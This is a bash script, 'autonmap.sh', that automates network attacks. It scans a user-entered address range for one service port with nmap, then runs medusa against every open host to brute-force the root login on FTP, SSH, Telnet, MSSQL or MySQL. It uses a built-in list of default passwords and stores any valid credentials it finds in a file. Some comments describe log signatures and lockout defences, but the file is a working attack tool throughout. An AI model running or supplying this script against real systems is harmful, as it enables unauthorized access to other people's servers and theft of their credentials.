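#!/bin/bash
# autonmap.sh
# Author: Qingzheng
# Platform: backtrack5 r3
#
# Interactive wrapper around nmap and medusa. It prompts for a target range
# (Rhost) and one service port (Rport), runs an nmap SYN + version scan of
# that port, and hands the hosts reported open to medusa together with a
# small built-in user/password list. Work files live in ./tmp under the
# directory the script is started from.
#
# What this looks like from the target side (useful when reviewing logs):
#   - one source address sweeping a single TCP port across a range with SYN
#     probes followed by service-version probes;
#   - then repeated login attempts for user "root" against every host that
#     answered, using the short default-password list below (plus the empty
#     password and password == user name, via medusa's "-e ns").
# Login rate limiting / lockout and the absence of default or empty root
# passwords are the controls that make the second stage fail.

#######################################
# Print the banner and an example of the two prompts.
# Globals: red, white (read) - colour escapes set by Main
#######################################
Usage() {
  echo "########################################"
  echo "#Auto scan and attack #"
  echo "#autonmap.sh #"
  echo "#Author: Qingzheng #"
  echo "########################################"
  echo -e "${red}Example:"
  echo -e "Rhost:>> 192.168.0.0/24"
  echo -e "Rport:>> 21 (21/22/23/1433/3306)$white"
  echo
}

#######################################
# Create ./tmp and the two word lists if they are missing.
# The original nested both file checks inside the "directory is missing"
# branch, so an existing ./tmp without the lists was never repaired; the
# checks are independent here.
# Returns: non-zero if the work directory cannot be created
#######################################
DictCreate() {
  local workdir
  workdir="$(pwd)/tmp"

  mkdir -p -- "$workdir" || return

  # One entry per line, which is the layout medusa's -U/-P files use.
  if [ ! -e "$workdir/user.dict" ]; then
    printf '%s\n' root >"$workdir/user.dict"
  fi
  if [ ! -e "$workdir/passwd.dict" ]; then
    printf '%s\n' \
      admin administrator administrators root mysql admin123 admini123 \
      toor toor123 mysql mysql123 123456 12345678 \
      >"$workdir/passwd.dict"
  fi
}

#######################################
# Install nmap and medusa through apt-get when they are not on PATH.
# The original tested only /usr/local/bin/<tool>, so a copy installed
# anywhere else (for example by apt itself) triggered apt-get on every run.
# Globals: blue, white (read)
#######################################
Checknmapmedusa() {
  if ! command -v nmap >/dev/null 2>&1; then
    echo -e "[$blue>$white] Start install nmap"
    apt-get install -y nmap | sed 's/^/[nmap]/g'
  fi
  if ! command -v medusa >/dev/null 2>&1; then
    echo -e "[$blue>$white] Start install medusa"
    apt-get install -y medusa | sed 's/^/[medusa]/g'
  fi
}

#######################################
# Scan Rhost for Rport, then run medusa against the hosts found open.
# Globals: Rhost, Rport, Rserver, blue, white (read)
# Files:   ./tmp/scan-<port>          nmap grepable output (removed after use)
#          ./tmp/scan-analyze-<port>  one open host per line
#          ./tmp/output-<port>        raw medusa log (removed after use)
#          ./tmp/output-<port>.lst    accumulated "ACCOUNT FOUND" lines
# Returns: 1 when Rhost is rejected by the input check
#######################################
ScanAttack() {
  local workdir scan_file hosts_file out_file target_re
  workdir="$(pwd)/tmp"
  scan_file="$workdir/scan-$Rport"
  hosts_file="$workdir/scan-analyze-$Rport"
  out_file="$workdir/output-$Rport"

  # Rhost comes straight from the prompt. Restrict it to characters that
  # occur in addresses, CIDR/range notation and host names, and require an
  # alphanumeric first character so the value cannot be read as an option.
  target_re='^[A-Za-z0-9][A-Za-z0-9._:/,-]*$'
  if [[ ! $Rhost =~ $target_re ]]; then
    echo -e "[$blue-$white] Invalid Rhost"
    return 1
  fi

  echo -e "[$blue>$white] Starting scan..."
  # Passed as an argument vector, like the medusa call below. The original
  # gave xterm one quoted string, which xterm hands to a shell, so any shell
  # metacharacter typed at the Rhost prompt was interpreted.
  xterm -geometry 80x20+80+0 -e \
    nmap -v -sS -sV -oG "$scan_file" -p "$Rport" "$Rhost"

  # Keep the address column of the lines where the port is open and the
  # detected service name equals Rserver.
  grep -F -- "$Rport/open/tcp//$Rserver//" "$scan_file" \
    | cut -d' ' -f2 >"$hosts_file" \
    && rm -f -- "$scan_file"
  sed "s/^/ > /g" "$hosts_file"

  if [ -s "$hosts_file" ]; then
    echo -e "[$blue>$white] Straring try crack..."
    xterm -geometry 80x20+80+640 -e \
      medusa -U "$workdir/user.dict" -P "$workdir/passwd.dict" -e ns -v 10 \
      -H "$hosts_file" -M "$Rserver" -O "$out_file"

    if [ -s "$out_file" ]; then
      # The .lst file ends up holding valid credentials in clear text; it is
      # appended to across runs and is never cleaned up by this script.
      grep "ACCOUNT FOUND: " "$out_file" \
        | awk '{print $3,$4,$5,$6,$7,$8,$9}' \
        | sed "s/$Rserver/>/g" \
        | uniq \
        | tee -a "$out_file.lst" \
        && rm -f -- "$out_file"
      echo -e "[$blue>$white] Medusa DONE!!"
    else
      echo -e "[$blue-$white] Not founding passwd!!"
    fi
  else
    echo -e "[$blue>$white] Not founding hosts"
  fi
}

#####################################################################
#####################################################################

#######################################
# Entry point: set colours, prepare ./tmp and the tools, then loop on the
# Rhost/Rport prompts until a port outside the supported set is entered.
# Globals: blue, red, white, underline, Rhost, Rport, Rserver (written)
#######################################
Main() {
  # As shown on the page, three of these lacked the leading backslash and
  # printed as literal text ("e[01;34m") instead of switching colour.
  blue="\e[01;34m"
  red="\e[01;31m"
  white="\e[00m"
  underline="\033[4m"

  # Everything written under ./tmp, including recovered credentials, is
  # created owner-only.
  umask 077

  Usage
  DictCreate || return 1
  Checknmapmedusa

  while true; do
    echo -en "${underline}Rhost$white:$blue>>$white"
    read -r Rhost
    echo -en "${underline}Rport$white:$blue>>$white"
    read -r Rport

    # The port doubles as the selector for the medusa module name.
    case "$Rport" in
      21)   Rserver=ftp ;;
      22)   Rserver=ssh ;;
      23)   Rserver=telnet ;;
      1433) Rserver=mssql ;;
      3306) Rserver=mysql ;;
      *)
        echo -e "[$blue>$white] Input error! Quit!!"
        break
        ;;
    esac
    ScanAttack
  done
}

#########################################################
#########################################################
Main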